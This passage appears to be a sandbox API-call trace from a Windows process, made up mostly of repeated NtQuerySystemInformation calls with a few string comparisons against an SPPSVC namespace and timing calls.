SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0280.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0280.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0280.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0280.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0280.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcea0, Length=0x28, ResultLength=0x0) [0280.519] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0280.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0280.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0280.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.519] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0280.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0280.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0280.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0280.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0280.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0280.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0280.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x28, ResultLength=0x0) [0280.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0280.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x28, ResultLength=0x0) [0280.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x28, ResultLength=0x0) [0280.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0280.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x20, ResultLength=0x0) [0280.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x20, ResultLength=0x0) [0280.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x20, ResultLength=0x0) [0280.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x20, ResultLength=0x0) [0280.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0280.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x20, ResultLength=0x0) [0280.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0280.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0280.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.533] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fce70 | out: lpSystemTimeAsFileTime=0xf7a68fce70*(dwLowDateTime=0x399409ef, dwHighDateTime=0x1d63874)) [0280.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0280.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x28, ResultLength=0x0) [0280.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd78, Length=0x50, ResultLength=0x0) [0280.533] GetTickCount () returned 0x11863d8 [0280.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc48, Length=0x58, ResultLength=0x0) [0280.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0280.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0280.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0280.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0280.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0280.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0280.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc48, Length=0x58, ResultLength=0x0) [0280.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0280.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x28, ResultLength=0x0) [0280.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0280.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0280.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0280.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0280.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0280.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0280.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0280.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.557] NtQuerySystemInformation (SystemInformationClass=0xb9, 